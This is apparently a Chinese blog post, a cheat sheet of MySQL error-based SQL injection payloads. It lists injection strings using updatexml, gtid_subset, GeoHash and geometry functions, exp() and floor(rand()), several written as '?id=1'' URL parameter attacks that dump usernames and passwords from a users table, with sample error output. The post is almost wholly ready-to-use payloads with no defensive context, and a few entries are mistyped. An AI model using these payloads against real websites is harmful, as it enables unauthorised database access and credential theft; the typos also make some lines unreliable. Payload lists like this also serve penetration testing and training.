4、报错注入

 

updatexml( ) , concat()

 

mysql> select updatexml(1,concat(0x7e,(select database()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~security~'

 

updatexml( ) , concat_ws()

 

mysql> select updatexml(1,concat_ws(0x5c,0x5c,substr(@@version,1,99)),1);
ERROR 1105 (HY000): XPATH syntax error: '\\5.7.26'

 

 

 

 

gtid_subset( )

 

?id=1' and gtid_subset(concat(0x7e,(select group_concat(password,':',username) from users),0x7e),1) --+

 

gtid_subtract( )

 

?id=1' and gtid_subtract(concat(0x7e,(select group_concat(password,':',username) from users),0x7e),1) --+

 

 

 

 


空间GeoHash函数   需要MySQL > 5.7.0


ST_PointFromGeoHash( )

?id=1' and ST_PointFromGeoHash(version(),1)--+

 

 

 

ST_LatFromGeoHash( )

?id=1' and ST_LatFromGeoHash((select * from(select * from(select(select(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password)from users),0x7e))))a)b))--+

 

 

ST_LongFromGeoHash( )

?id=1' and ST_LongFromGeoHash((select * from(select * from(select(select(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password)from users),0x7e))))a)b))--+

 

 

 

 

数学函数 MySQL 5.1 - 5.5.47

geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

 

 

multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

 

 

polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

 

 

ormultipolygon()

ormultipolygon((select * from(select * from(select(SELECTGROUP_CONCAT(user,':',password)from manage))asd)asd))--+

 

 

multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

 

 

linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

 

 

linestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

 

 

exp()

select * from test where id=1 and exp(~(select * from(select user())a));

 

 

 

 

 

floor() rand() 主键报错

?id=1' and(Select 1 from(Select count(*),concat(user(),floor(rand(14)*2))x from information_schema.tables group by x)a)--+

 

 

posted @ 2023-07-15 12:49  baiye1  阅读(63)  评论(0)    收藏  举报